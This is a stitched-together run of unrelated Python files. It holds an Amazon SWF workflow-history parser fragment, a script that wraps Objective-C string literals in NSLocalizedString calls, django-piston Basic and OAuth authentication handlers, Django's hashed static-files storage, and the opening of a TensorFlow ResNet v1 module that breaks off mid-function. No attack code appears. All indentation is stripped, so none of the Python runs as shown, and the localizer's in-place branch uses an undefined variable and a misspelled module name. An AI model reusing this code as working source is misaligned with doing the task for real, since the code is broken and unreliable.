@classmethod
def event_from_description(cls, description, related=[]):
event_type = description['eventType']
if event_type == 'WorkflowExecutionStarted':
dt = datetime.fromtimestamp(description['eventTimestamp'])
return (description['eventId'], ProcessStartedEvent(datetime=dt))
elif event_type == 'DecisionTaskStarted':
dt = datetime.fromtimestamp(description['eventTimestamp'])
return (description['eventId'], DecisionStartedEvent(datetime=dt))
elif event_type in ['ActivityTaskScheduled','StartChildWorkflowExecutionInitiated','TimerStarted']:
return cls._decision_event(description, related)
elif event_type.startswith('ActivityTask') and not event_type == 'ActivityTaskScheduled':
return cls._activity_event(description, related)
elif event_type == 'WorkflowExecutionSignaled':
return cls._signal_event(description, related)
elif event_type.startswith('ChildWorkflowExecution'):
return cls._child_process_event(description, related)
elif event_type == 'TimerFired':
return cls._timer_event(description, related)
else:
return None
@classmethod
def from_description(cls, description):
execution_desc = description.get('workflowExecution', None) or description.get('execution', None)
if not execution_desc:
return None
pid = cls.pid_from_description(execution_desc)
workflow = description.get('workflowType', {}).get('name', None)
tags = description.get('tagList', [])
events = []
event_descriptions = description.get('events', [])
for event_description in event_descriptions:
start_attrs = event_description.get('workflowExecutionStartedEventAttributes', None)
if start_attrs:
try:
input = json.loads(start_attrs['input'])
except:
input = start_attrs.get('input', None)
tags = start_attrs['tagList']
parent = None
parent_wfe = start_attrs.get('parentWorkflowExecution', None)
if parent_wfe:
parent = cls.pid_from_description(parent_wfe)
event = cls.event_from_description(event_description, related=event_descriptions)
if event:
events.append(event)
# events is [(order, event)]. history is events sorted by logical order
history = [event for (log_order, event) in sorted(events, key=lambda (log_order, event): int(log_order))]
return AmazonSWFProcess(id=pid, workflow=workflow, input=input, tags=tags, history=history, parent=parent)
@classmethod
def pid_from_description(cls, description):
return '%s:%s' % (description['workflowId'], description['runId'])
| |
#import rlcompleter
import gnureadline as readline
import argparse
import re
import sys
import slugify
import tokenize
import colored
import glob
import shutil
import codecs
TEMPLATE =\
"""
NSLocalizedStringWithDefaultValue(@"{slug}",
{table}, {bundle},
@"{value}",
@"{comment}"
)"""
DEFAULT_AUTOREPLACE_PREFIX = "__LOCALIZE"
DEFAULT_SLUG_FORMATTING_ARGUMENT_REPLACE = "[]"
DEFAULT_LOCALIZATIONSTABLE = "kDefaultLocalizationsTable"
DEFAULT_BUNDLE = "kClassBundle"
slugify.ALLOWED_CHARS_PATTERN = re.compile(r'[^-a-z0-9[]]+')
def context_buf_readlines(infile, A=10, B=6):
prebuf = []
postbuf = []
linenum = 0
for line in infile.readlines():
postbuf.append(line)
if len(postbuf) < B:
continue
yield prebuf, postbuf[0], postbuf[1:], linenum
linenum += 1
prebuf = prebuf[-A:] + postbuf[0:1]
postbuf = postbuf[1:]
for line in postbuf:
yield prebuf, postbuf[0], postbuf[1:], linenum
linenum += 1
prebuf = prebuf[-A:] + postbuf[0:1]
postbuf = postbuf[1:]
class NoMatchException(Exception):
pass
class ReplaceAction(Exception):
pass
default_config = dict(table = DEFAULT_LOCALIZATIONSTABLE,
bundle = DEFAULT_BUNDLE,
autoreplace_prefix = DEFAULT_AUTOREPLACE_PREFIX,
ask_all = False,
comments = False)
def parse(filename, infile, outfile,
ask_all = False,
comments = False,
table = DEFAULT_LOCALIZATIONSTABLE,
bundle = DEFAULT_BUNDLE,
autoreplace_prefix = DEFAULT_AUTOREPLACE_PREFIX):
interactive = ask_all or comments
string_re = re.compile(r'(.*?)@"([^"]+)"(.*)')
prefix_re = re.compile(r"NSLocalized[a-zA-Z]String\(");
fmt_re = re.compile(r"%[-0-9\.]*[l]?[difes\@]")
def slug_from_string(sel):
items = fmt_re.split(sel)
newitems = map(lambda item:slugify.slugify(item), items)
delimiter = "-"+DEFAULT_SLUG_FORMATTING_ARGUMENT_REPLACE +"-"
slug = delimiter.join(filter(lambda x:len(x), newitems))
return slug
w = sys.stdout.write
fg = colored.fg
attr = colored.attr
quit_after = False
linenum = 0
replace_autoprefix = True
#for line in infile.readlines():
for prebuf, line, postbuf, linenum in context_buf_readlines(infile):
try:
match = string_re.match(line)
if not match:
raise NoMatchException
prefix = match.group(1)
sel = match.group(2)
postfix = match.group(3)
def _print_preamble():
header = "%s (%d):" % (filename, linenum)
data = [
fg(2), attr(1), header, "_" * (60 - len(header) -5 ), attr(0), "\n",
" ", " ".join(prebuf),
fg(3), "> ", prefix, fg(4), '@"', fg(2), attr(1), sel, fg(4), '"', attr(0), '\n'
" ", " ".join(postbuf)
]
w("".join(data))
print_preamble = _print_preamble
if prefix_re.search(prefix):
raise NoMatchException
if prefix[-1] in "[":
raise NoMatchException
try:
if replace_autoprefix and prefix.endswith(autoreplace_prefix):
prefix = prefix[:-len(autoreplace_prefix)]
raise ReplaceAction
if ask_all:
print_preamble()
print_preamble = lambda :None
answer = raw_input(colored.fg(1) + colored.attr(1) + "Replace String? [N/y]" + colored.attr(0))
if len(answer) > 0:
if answer in "Yy":
raise ReplaceAction
elif answer in "qQ":
ask_all = False
comments = False
quit_after = True
replace_autoprefix = False
except ReplaceAction:
slug = slug_from_string(sel)
cmt = sel
try:
if comments:
print_preamble()
def hook():
readline.insert_text(slug)
readline.redisplay()
readline.set_pre_input_hook(hook)
if len(slug)>30:
w( fg(1) + attr(1) + ( "ID for translation:" ) + attr(0))
w("\n" + fg(1) )
newslug = raw_input("> ")
w(attr(0))
else:
w("\n" + fg(1) + attr(1))
newslug = raw_input( "ID for translation: ")
w(attr(0))
if newslug:
slug = newslug
def hook():
readline.insert_text(sel)
readline.redisplay()
readline.set_pre_input_hook(hook)
cmt = raw_input(colored.fg(1) + colored.attr(1) + "Comment for translator: " + colored.attr(0))
if not cmt:
cmt = sel
readline.set_pre_input_hook()
except KeyboardInterrupt:
w("\n")
raise
else:
rep = TEMPLATE.format(slug=slug, value = sel, comment = cmt, bundle = bundle, table = table )
if comments or interactive:
w( "".join(prebuf[-3:] +
[
prefix, fg(4), rep, attr(0), postfix, "\n"
] + postbuf[0:3]
))
outfile.write("".join([prefix, rep, postfix, "\n"]))
continue
except KeyboardInterrupt:
raise
else:
raise NoMatchException
except KeyboardInterrupt:
ask_all = False
comments = False
interactive = False
replace_autoprefix = False
if line:
outfile.writelines([line])
quit_after = True
except NoMatchException:
outfile.writelines([line])
if quit_after:
raise KeyboardInterrupt
def main():
epilog = """Localize_m has two modes:
1. Interactively parse your file, and ask for each string whether it
should be localized ( `--ask-all` option).
2. Automatically parse your file and replace each `@"..."` string prefixed
with `__LOCALIZE` with a localized version. This mode can run in a fully
automated fashion or, when you use the `-c` option, `localize_m` will
ask you to edit the slug and to provide a comment for the translator.
Localize_m inserts the following code for each `@"..."` string you
choose to replace:
NSLocalizedStringWithDefaultValue(<slug>,
kDefaultLocalizationTable, kClassBundle,
@"...", @"...")
"""
parser = argparse.ArgumentParser(description = "Localize_m helps with localizing your objc `.m` files",
epilog = epilog,
formatter_class = argparse.RawDescriptionHelpFormatter,
)
input_group = parser.add_argument_group("Input")
input_group.add_argument('-p', '--path', type = str, help = "localize all .m files in path")
input_group.add_argument('infile', metavar = 'infile', nargs = '?',
type=str,
help='Input .m file')
input_group.add_argument('-o','--outfile', metavar = 'outfile', nargs = '?',
type=str,
default=None,
help='Output file, otherwise stdout')
input_group.add_argument("-a", "--ask-all", help = "ask for all strings (interactive))", default = False, action = "store_true")
input_group.add_argument("-c", "--comments", help = "ask for comments and ids (interactive)", default = False, action = "store_true")
input_group.add_argument("--inplace", help = "localize file in-place", default = False, action = "store_true")
custom = parser.add_argument_group("Customization")
custom.add_argument("--table", type = str, help = "custom localizations table argument", default = DEFAULT_LOCALIZATIONSTABLE)
custom.add_argument("--bundle", type = str, help = "custom NSBundle argument", default = DEFAULT_BUNDLE)
custom.add_argument("--replace", type = str, help = "Auto localization prefix string", default = DEFAULT_AUTOREPLACE_PREFIX)
args = parser.parse_args()
if not args.infile and not args.path:
parser.print_help()
return -1
if args.ask_all:
args.comments = True
config = dict(table = args.table,
bundle = args.bundle,
autoreplace_prefix = args.replace,
ask_all = args.ask_all,
comments = args.comments
)
if args.inplace:
from io import StringIO
fp = codecs.open(infile, "r", encoding = "utf-8")
inbuf = StringIO(fp.read())
fp.close()
args.infile.close()
outfile = codec.open(infile, "w", encoding="utf-8")
parse(infile, inbuf, outfile, args.ask_all, args.comments)
else:
try:
if args.infile:
if not args.outfile:
outbuf = sys.stdout
if args.ask_all or args.comments:
print "Output to stdout is only supported in non-interactive mode"
return -1
else:
outbuf = codecs.open(args.outfile, "w", encoding="utf-8")
parse(args.infile, codecs.open(args.infile,"r", encoding="utf-8"), outbuf, **config)
elif args.path: # implies inplace
from io import StringIO
for fn in glob.glob(args.path + "/*.m"):
intext = StringIO(codecs.open(fn, encoding="utf-8",mode="r").read())
outfile = open(fn, "w")
parse(fn, intext, outfile, **config)
except KeyboardInterrupt:
return -1
return 0
| |
import binascii
import oauth
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.template import loader
from django.contrib.auth import authenticate
from django.conf import settings
from django.core.urlresolvers import get_callable
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import render_to_response
from django.template import RequestContext
from piston import forms
class NoAuthentication(object):
"""
Authentication handler that always returns
True, so no authentication is needed, nor
initiated (`challenge` is missing.)
"""
def is_authenticated(self, request):
return True
class HttpBasicAuthentication(object):
"""
Basic HTTP authenticater. Synopsis:
Authentication handlers must implement two methods:
- `is_authenticated`: Will be called when checking for
authentication. Receives a `request` object, please
set your `User` object on `request.user`, otherwise
return False (or something that evaluates to False.)
- `challenge`: In cases where `is_authenticated` returns
False, the result of this method will be returned.
This will usually be a `HttpResponse` object with
some kind of challenge headers and 401 code on it.
"""
def __init__(self, auth_func=authenticate, realm='API'):
self.auth_func = auth_func
self.realm = realm
def is_authenticated(self, request):
auth_string = request.META.get('HTTP_AUTHORIZATION', None)
if not auth_string:
return False
try:
(authmeth, auth) = auth_string.split(" ", 1)
if not authmeth.lower() == 'basic':
return False
auth = auth.strip().decode('base64')
(username, password) = auth.split(':', 1)
except (ValueError, binascii.Error):
return False
request.user = self.auth_func(username=username, password=password) \
or AnonymousUser()
return not request.user in (False, None, AnonymousUser())
def challenge(self):
resp = HttpResponse("Authorization Required")
resp['WWW-Authenticate'] = 'Basic realm="%s"' % self.realm
resp.status_code = 401
return resp
def load_data_store():
'''Load data store for OAuth Consumers, Tokens, Nonces and Resources
'''
path = getattr(settings, 'OAUTH_DATA_STORE', 'piston.store.DataStore')
# stolen from django.contrib.auth.load_backend
i = path.rfind('.')
module, attr = path[:i], path[i+1:]
try:
mod = __import__(module, {}, {}, attr)
except ImportError, e:
raise ImproperlyConfigured, 'Error importing OAuth data store %s: "%s"' % (module, e)
try:
cls = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured, 'Module %s does not define a "%s" OAuth data store' % (module, attr)
return cls
# Set the datastore here.
oauth_datastore = load_data_store()
def initialize_server_request(request):
"""
Shortcut for initialization.
"""
oauth_request = oauth.OAuthRequest.from_request(
request.method, request.build_absolute_uri(),
headers=request.META, parameters=dict(request.REQUEST.items()),
query_string=request.environ.get('QUERY_STRING', ''))
if oauth_request:
oauth_server = oauth.OAuthServer(oauth_datastore(oauth_request))
oauth_server.add_signature_method(oauth.OAuthSignatureMethod_PLAINTEXT())
oauth_server.add_signature_method(oauth.OAuthSignatureMethod_HMAC_SHA1())
else:
oauth_server = None
return oauth_server, oauth_request
def send_oauth_error(err=None):
"""
Shortcut for sending an error.
"""
response = HttpResponse(err.message.encode('utf-8'))
response.status_code = 401
realm = 'OAuth'
header = oauth.build_authenticate_header(realm=realm)
for k, v in header.iteritems():
response[k] = v
return response
def oauth_request_token(request):
oauth_server, oauth_request = initialize_server_request(request)
if oauth_server is None:
return INVALID_PARAMS_RESPONSE
try:
token = oauth_server.fetch_request_token(oauth_request)
response = HttpResponse(token.to_string())
except oauth.OAuthError, err:
response = send_oauth_error(err)
return response
def oauth_auth_view(request, token, callback, params):
form = forms.OAuthAuthenticationForm(initial={
'oauth_token': token.key,
'oauth_callback': callback,
})
return render_to_response('piston/authorize_token.html',
{ 'form': form }, RequestContext(request))
@login_required
def oauth_user_auth(request):
oauth_server, oauth_request = initialize_server_request(request)
if oauth_request is None:
return INVALID_PARAMS_RESPONSE
try:
token = oauth_server.fetch_request_token(oauth_request)
except oauth.OAuthError, err:
return send_oauth_error(err)
try:
callback = oauth_server.get_callback(oauth_request)
except:
callback = None
if request.method == "GET":
params = oauth_request.get_normalized_parameters()
oauth_view = getattr(settings, 'OAUTH_AUTH_VIEW', None)
if oauth_view is None:
return oauth_auth_view(request, token, callback, params)
else:
return get_callable(oauth_view)(request, token, callback, params)
elif request.method == "POST":
try:
form = forms.OAuthAuthenticationForm(request.POST)
if form.is_valid():
token = oauth_server.authorize_token(token, request.user)
args = '?'+token.to_string(only_key=True)
else:
args = '?error=%s' % 'Access not granted by user.'
if not callback:
callback = getattr(settings, 'OAUTH_CALLBACK_VIEW')
return get_callable(callback)(request, token)
response = HttpResponseRedirect(callback+args)
except oauth.OAuthError, err:
response = send_oauth_error(err)
else:
response = HttpResponse('Action not allowed.')
return response
def oauth_access_token(request):
oauth_server, oauth_request = initialize_server_request(request)
if oauth_request is None:
return INVALID_PARAMS_RESPONSE
try:
token = oauth_server.fetch_access_token(oauth_request)
return HttpResponse(token.to_string())
except oauth.OAuthError, err:
return send_oauth_error(err)
INVALID_PARAMS_RESPONSE = send_oauth_error(oauth.OAuthError('Invalid request parameters.'))
class OAuthAuthentication(object):
"""
OAuth authentication. Based on work by Leah Culver.
"""
def __init__(self, realm='API'):
self.realm = realm
self.builder = oauth.build_authenticate_header
def is_authenticated(self, request):
"""
Checks whether a means of specifying authentication
is provided, and if so, if it is a valid token.
Read the documentation on `HttpBasicAuthentication`
for more information about what goes on here.
"""
if self.is_valid_request(request):
try:
consumer, token, parameters = self.validate_token(request)
except oauth.OAuthError, err:
print send_oauth_error(err)
return False
if consumer and token:
request.user = token.user
request.throttle_extra = token.consumer.id
return True
return False
def challenge(self):
"""
Returns a 401 response with a small bit on
what OAuth is, and where to learn more about it.
When this was written, browsers did not understand
OAuth authentication on the browser side, and hence
the helpful template we render. Maybe some day in the
future, browsers will take care of this stuff for us
and understand the 401 with the realm we give it.
"""
response = HttpResponse()
response.status_code = 401
realm = 'API'
for k, v in self.builder(realm=realm).iteritems():
response[k] = v
tmpl = loader.render_to_string('oauth/challenge.html',
{ 'MEDIA_URL': settings.MEDIA_URL })
response.content = tmpl
return response
@staticmethod
def is_valid_request(request):
"""
Checks whether the required parameters are either in
the http-authorization header sent by some clients,
which is by the way the preferred method according to
OAuth spec, but otherwise fall back to `GET` and `POST`.
"""
must_have = [ 'oauth_'+s for s in [
'consumer_key', 'token', 'signature',
'signature_method', 'timestamp', 'nonce' ] ]
is_in = lambda l: all([ (p in l) for p in must_have ])
auth_params = request.META.get("HTTP_AUTHORIZATION", "")
req_params = request.REQUEST
return is_in(auth_params) or is_in(req_params)
@staticmethod
def validate_token(request, check_timestamp=True, check_nonce=True):
oauth_server, oauth_request = initialize_server_request(request)
return oauth_server.verify_request(oauth_request)
| |
import hashlib
import json
import os
import posixpath
import re
from urllib.parse import unquote, urldefrag, urlsplit, urlunsplit
from django.conf import settings
from django.contrib.staticfiles.utils import check_settings, matches_patterns
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.utils.functional import LazyObject
class StaticFilesStorage(FileSystemStorage):
"""
Standard file system storage for static files.
The defaults for ``location`` and ``base_url`` are
``STATIC_ROOT`` and ``STATIC_URL``.
"""
def __init__(self, location=None, base_url=None, *args, **kwargs):
if location is None:
location = settings.STATIC_ROOT
if base_url is None:
base_url = settings.STATIC_URL
check_settings(base_url)
super().__init__(location, base_url, *args, **kwargs)
# FileSystemStorage fallbacks to MEDIA_ROOT when location
# is empty, so we restore the empty value.
if not location:
self.base_location = None
self.location = None
def path(self, name):
if not self.location:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_ROOT "
"setting to a filesystem path.")
return super().path(name)
class HashedFilesMixin:
default_template = """url("%(url)s")"""
max_post_process_passes = 5
patterns = (
("*.css", (
r"""(?P<matched>url\(['"]{0,1}\s*(?P<url>.*?)["']{0,1}\))""",
(
r"""(?P<matched>@import\s*["']\s*(?P<url>.*?)["'])""",
"""@import url("%(url)s")""",
),
)),
('*.js', (
(
r'(?P<matched>)^(//# (?-i:sourceMappingURL)=(?P<url>.*))$',
'//# sourceMappingURL=%(url)s',
),
(
r"""(?P<matched>import\s+(?s:(?P<imports>.*?))\s*from\s*["'](?P<url>.*?)["'])""",
'import %(imports)s from "%(url)s"',
),
(
r"""(?P<matched>export\s+(?s:(?P<exports>.*?))\s*from\s*["'](?P<url>.*?)["'])""",
'export %(exports)s from "%(url)s"',
),
(r"""(?P<matched>import\(["'](?P<url>.*?)["']\))""", 'import("%(url)s")'),
)),
)
keep_intermediate_files = True
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._patterns = {}
self.hashed_files = {}
for extension, patterns in self.patterns:
for pattern in patterns:
if isinstance(pattern, (tuple, list)):
pattern, template = pattern
else:
template = self.default_template
compiled = re.compile(pattern, re.IGNORECASE)
self._patterns.setdefault(extension, []).append((compiled, template))
def file_hash(self, name, content=None):
"""
Return a hash of the file with the given name and optional content.
"""
if content is None:
return None
md5 = hashlib.md5()
for chunk in content.chunks():
md5.update(chunk)
return md5.hexdigest()[:12]
def hashed_name(self, name, content=None, filename=None):
# `filename` is the name of file to hash if `content` isn't given.
# `name` is the base name to construct the new hashed filename from.
parsed_name = urlsplit(unquote(name))
clean_name = parsed_name.path.strip()
filename = (filename and urlsplit(unquote(filename)).path.strip()) or clean_name
opened = content is None
if opened:
if not self.exists(filename):
raise ValueError("The file '%s' could not be found with %r." % (filename, self))
try:
content = self.open(filename)
except OSError:
# Handle directory paths and fragments
return name
try:
file_hash = self.file_hash(clean_name, content)
finally:
if opened:
content.close()
path, filename = os.path.split(clean_name)
root, ext = os.path.splitext(filename)
file_hash = ('.%s' % file_hash) if file_hash else ''
hashed_name = os.path.join(path, "%s%s%s" %
(root, file_hash, ext))
unparsed_name = list(parsed_name)
unparsed_name[2] = hashed_name
# Special casing for a @font-face hack, like url(myfont.eot?#iefix")
# http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
if '?#' in name and not unparsed_name[3]:
unparsed_name[2] += '?'
return urlunsplit(unparsed_name)
def _url(self, hashed_name_func, name, force=False, hashed_files=None):
"""
Return the non-hashed URL in DEBUG mode.
"""
if settings.DEBUG and not force:
hashed_name, fragment = name, ''
else:
clean_name, fragment = urldefrag(name)
if urlsplit(clean_name).path.endswith('/'): # don't hash paths
hashed_name = name
else:
args = (clean_name,)
if hashed_files is not None:
args += (hashed_files,)
hashed_name = hashed_name_func(*args)
final_url = super().url(hashed_name)
# Special casing for a @font-face hack, like url(myfont.eot?#iefix")
# http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
query_fragment = '?#' in name # [sic!]
if fragment or query_fragment:
urlparts = list(urlsplit(final_url))
if fragment and not urlparts[4]:
urlparts[4] = fragment
if query_fragment and not urlparts[3]:
urlparts[2] += '?'
final_url = urlunsplit(urlparts)
return unquote(final_url)
def url(self, name, force=False):
"""
Return the non-hashed URL in DEBUG mode.
"""
return self._url(self.stored_name, name, force)
def url_converter(self, name, hashed_files, template=None):
"""
Return the custom URL converter for the given file name.
"""
if template is None:
template = self.default_template
def converter(matchobj):
"""
Convert the matched URL to a normalized and hashed URL.
This requires figuring out which files the matched URL resolves
to and calling the url() method of the storage.
"""
matches = matchobj.groupdict()
matched = matches['matched']
url = matches['url']
# Ignore absolute/protocol-relative and data-uri URLs.
if re.match(r'^[a-z]+:', url):
return matched
# Ignore absolute URLs that don't point to a static file (dynamic
# CSS / JS?). Note that STATIC_URL cannot be empty.
if url.startswith('/') and not url.startswith(settings.STATIC_URL):
return matched
# Strip off the fragment so a path-like fragment won't interfere.
url_path, fragment = urldefrag(url)
if url_path.startswith('/'):
# Otherwise the condition above would have returned prematurely.
assert url_path.startswith(settings.STATIC_URL)
target_name = url_path[len(settings.STATIC_URL):]
else:
# We're using the posixpath module to mix paths and URLs conveniently.
source_name = name if os.sep == '/' else name.replace(os.sep, '/')
target_name = posixpath.join(posixpath.dirname(source_name), url_path)
# Determine the hashed name of the target file with the storage backend.
hashed_url = self._url(
self._stored_name, unquote(target_name),
force=True, hashed_files=hashed_files,
)
transformed_url = '/'.join(url_path.split('/')[:-1] + hashed_url.split('/')[-1:])
# Restore the fragment that was stripped off earlier.
if fragment:
transformed_url += ('?#' if '?#' in url else '#') + fragment
# Return the hashed version to the file
matches['url'] = unquote(transformed_url)
return template % matches
return converter
def post_process(self, paths, dry_run=False, **options):
"""
Post process the given dictionary of files (called from collectstatic).
Processing is actually two separate operations:
1. renaming files to include a hash of their content for cache-busting,
and copying those files to the target storage.
2. adjusting files which contain references to other files so they
refer to the cache-busting filenames.
If either of these are performed on a file, then that file is considered
post-processed.
"""
# don't even dare to process the files if we're in dry run mode
if dry_run:
return
# where to store the new paths
hashed_files = {}
# build a list of adjustable files
adjustable_paths = [
path for path in paths
if matches_patterns(path, self._patterns)
]
# Adjustable files to yield at end, keyed by the original path.
processed_adjustable_paths = {}
# Do a single pass first. Post-process all files once, yielding not
# adjustable files and exceptions, and collecting adjustable files.
for name, hashed_name, processed, _ in self._post_process(paths, adjustable_paths, hashed_files):
if name not in adjustable_paths or isinstance(processed, Exception):
yield name, hashed_name, processed
else:
processed_adjustable_paths[name] = (name, hashed_name, processed)
paths = {path: paths[path] for path in adjustable_paths}
substitutions = False
for i in range(self.max_post_process_passes):
substitutions = False
for name, hashed_name, processed, subst in self._post_process(paths, adjustable_paths, hashed_files):
# Overwrite since hashed_name may be newer.
processed_adjustable_paths[name] = (name, hashed_name, processed)
substitutions = substitutions or subst
if not substitutions:
break
if substitutions:
yield 'All', None, RuntimeError('Max post-process passes exceeded.')
# Store the processed paths
self.hashed_files.update(hashed_files)
# Yield adjustable files with final, hashed name.
yield from processed_adjustable_paths.values()
def _post_process(self, paths, adjustable_paths, hashed_files):
# Sort the files by directory level
def path_level(name):
return len(name.split(os.sep))
for name in sorted(paths, key=path_level, reverse=True):
substitutions = True
# use the original, local file, not the copied-but-unprocessed
# file, which might be somewhere far away, like S3
storage, path = paths[name]
with storage.open(path) as original_file:
cleaned_name = self.clean_name(name)
hash_key = self.hash_key(cleaned_name)
# generate the hash with the original content, even for
# adjustable files.
if hash_key not in hashed_files:
hashed_name = self.hashed_name(name, original_file)
else:
hashed_name = hashed_files[hash_key]
# then get the original's file content..
if hasattr(original_file, 'seek'):
original_file.seek(0)
hashed_file_exists = self.exists(hashed_name)
processed = False
# ..to apply each replacement pattern to the content
if name in adjustable_paths:
old_hashed_name = hashed_name
content = original_file.read().decode('utf-8')
for extension, patterns in self._patterns.items():
if matches_patterns(path, (extension,)):
for pattern, template in patterns:
converter = self.url_converter(name, hashed_files, template)
try:
content = pattern.sub(converter, content)
except ValueError as exc:
yield name, None, exc, False
if hashed_file_exists:
self.delete(hashed_name)
# then save the processed result
content_file = ContentFile(content.encode())
if self.keep_intermediate_files:
# Save intermediate file for reference
self._save(hashed_name, content_file)
hashed_name = self.hashed_name(name, content_file)
if self.exists(hashed_name):
self.delete(hashed_name)
saved_name = self._save(hashed_name, content_file)
hashed_name = self.clean_name(saved_name)
# If the file hash stayed the same, this file didn't change
if old_hashed_name == hashed_name:
substitutions = False
processed = True
if not processed:
# or handle the case in which neither processing nor
# a change to the original file happened
if not hashed_file_exists:
processed = True
saved_name = self._save(hashed_name, original_file)
hashed_name = self.clean_name(saved_name)
# and then set the cache accordingly
hashed_files[hash_key] = hashed_name
yield name, hashed_name, processed, substitutions
def clean_name(self, name):
return name.replace('\\', '/')
def hash_key(self, name):
return name
def _stored_name(self, name, hashed_files):
# Normalize the path to avoid multiple names for the same file like
# ../foo/bar.css and ../foo/../foo/bar.css which normalize to the same
# path.
name = posixpath.normpath(name)
cleaned_name = self.clean_name(name)
hash_key = self.hash_key(cleaned_name)
cache_name = hashed_files.get(hash_key)
if cache_name is None:
cache_name = self.clean_name(self.hashed_name(name))
return cache_name
def stored_name(self, name):
cleaned_name = self.clean_name(name)
hash_key = self.hash_key(cleaned_name)
cache_name = self.hashed_files.get(hash_key)
if cache_name:
return cache_name
# No cached name found, recalculate it from the files.
intermediate_name = name
for i in range(self.max_post_process_passes + 1):
cache_name = self.clean_name(
self.hashed_name(name, content=None, filename=intermediate_name)
)
if intermediate_name == cache_name:
# Store the hashed name if there was a miss.
self.hashed_files[hash_key] = cache_name
return cache_name
else:
# Move on to the next intermediate file.
intermediate_name = cache_name
# If the cache name can't be determined after the max number of passes,
# the intermediate files on disk may be corrupt; avoid an infinite loop.
raise ValueError("The name '%s' could not be hashed with %r." % (name, self))
class ManifestFilesMixin(HashedFilesMixin):
manifest_version = '1.0' # the manifest format standard
manifest_name = 'staticfiles.json'
manifest_strict = True
keep_intermediate_files = False
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hashed_files = self.load_manifest()
def read_manifest(self):
try:
with self.open(self.manifest_name) as manifest:
return manifest.read().decode()
except FileNotFoundError:
return None
def load_manifest(self):
content = self.read_manifest()
if content is None:
return {}
try:
stored = json.loads(content)
except json.JSONDecodeError:
pass
else:
version = stored.get('version')
if version == '1.0':
return stored.get('paths', {})
raise ValueError("Couldn't load manifest '%s' (version %s)" %
(self.manifest_name, self.manifest_version))
def post_process(self, *args, **kwargs):
self.hashed_files = {}
yield from super().post_process(*args, **kwargs)
if not kwargs.get('dry_run'):
self.save_manifest()
def save_manifest(self):
payload = {'paths': self.hashed_files, 'version': self.manifest_version}
if self.exists(self.manifest_name):
self.delete(self.manifest_name)
contents = json.dumps(payload).encode()
self._save(self.manifest_name, ContentFile(contents))
def stored_name(self, name):
parsed_name = urlsplit(unquote(name))
clean_name = parsed_name.path.strip()
hash_key = self.hash_key(clean_name)
cache_name = self.hashed_files.get(hash_key)
if cache_name is None:
if self.manifest_strict:
raise ValueError("Missing staticfiles manifest entry for '%s'" % clean_name)
cache_name = self.clean_name(self.hashed_name(name))
unparsed_name = list(parsed_name)
unparsed_name[2] = cache_name
# Special casing for a @font-face hack, like url(myfont.eot?#iefix")
# http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
if '?#' in name and not unparsed_name[3]:
unparsed_name[2] += '?'
return urlunsplit(unparsed_name)
class ManifestStaticFilesStorage(ManifestFilesMixin, StaticFilesStorage):
"""
A static file system storage backend which also saves
hashed copies of the files it saves.
"""
pass
class ConfiguredStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class(settings.STATICFILES_STORAGE)()
staticfiles_storage = ConfiguredStorage()
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains definitions for the original form of Residual Networks.
The 'v1' residual networks (ResNets) implemented in this module were proposed
by:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
Other variants were introduced in:
[2] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Identity Mappings in Deep Residual Networks. arXiv: 1603.05027
The networks defined in this module utilize the bottleneck building block of
[1] with projection shortcuts only for increasing depths. They employ batch
normalization *after* every weight layer. This is the architecture used by
MSRA in the Imagenet and MSCOCO 2016 competition models ResNet-101 and
ResNet-152. See [2; Fig. 1a] for a comparison between the current 'v1'
architecture and the alternative 'v2' architecture of [2] which uses batch
normalization *before* every weight layer in the so-called full pre-activation
units.
Typical use:
from tensorflow.contrib.slim.nets import resnet_v1
ResNet-101 for image classification into 1000 classes:
# inputs has shape [batch, 224, 224, 3]
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
net, end_points = resnet_v1.resnet_v1_101(inputs, 1000, is_training=False)
ResNet-101 for semantic segmentation into 21 classes:
# inputs has shape [batch, 513, 513, 3]
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
net, end_points = resnet_v1.resnet_v1_101(inputs,
21,
is_training=False,
global_pool=False,
output_stride=16)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from models.tensorflow import resnet_utils
resnet_arg_scope = resnet_utils.resnet_arg_scope
slim = tf.contrib.slim
@slim.add_arg_scope
def bottleneck(inputs, depth, depth_bottleneck, stride, rate=1,
outputs_collections=None, scope=None):
"""Bottleneck residual unit variant with BN after convolutions.
This is the original residual unit proposed in [1]. See Fig. 1(a) of [2] for
its definition. Note that we use here the bottleneck variant which has an
extra bottleneck layer.
When putting together two consecutive ResNet blocks that use this unit, one
should use stride = 2 in the last unit of the first block.
Args:
inputs: A tensor of size [batch, height, width, channels].
depth: The depth of the ResNet unit output.
depth_bottleneck: The depth of the bottleneck layers.
stride: The ResNet unit's stride. Determines the amount of downsampling of
the units output compared to its input.
rate: An integer, rate for atrous convolution.
outputs_collections: Collection to add the ResNet unit output.
scope: Optional variable_scope.
Returns:
The ResNet unit's output.
"""
with tf.variable_scope(scope, 'bottleneck_v1', [inputs]) as sc:
depth_in = slim.utils.last_dimension(inputs.get_shape(), min_rank=4)
if depth == depth_in:
